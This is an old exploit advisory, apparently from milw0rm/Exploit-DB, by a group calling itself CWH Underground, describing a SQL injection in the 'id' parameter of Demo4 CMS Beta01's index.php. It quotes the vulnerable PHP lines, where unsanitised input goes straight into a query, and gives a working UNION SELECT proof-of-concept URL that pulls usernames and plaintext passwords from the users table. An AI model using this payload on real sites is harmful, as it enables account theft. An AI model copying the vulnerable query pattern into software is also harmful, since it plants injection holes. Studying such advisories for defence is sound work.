Demo4 CMS - 'id' SQL Injection

EDB-ID:

5914




Platform:

PHP

Date:

2008-06-23


===============================================================
  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Demo4 CMS 
 VERSION     : Beta01
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/demo4
#####################################################

--- Remote SQL Injection ---

-----------------------------
 Vulnerable File [index.php]
-----------------------------

@Line

   8:  if ($_GET['id']=="")
   9:  $id = $startpage;
  10:  else
  11:  $id = $_GET['id'];
  12:  database_connect();
  13:  $query = "SELECT * from content
  14:         WHERE id = $id";
  15:  $error = mysql_error();

---------
 Exploit
---------

[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]


   **This exploits can get username and password (No Encryption)**

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]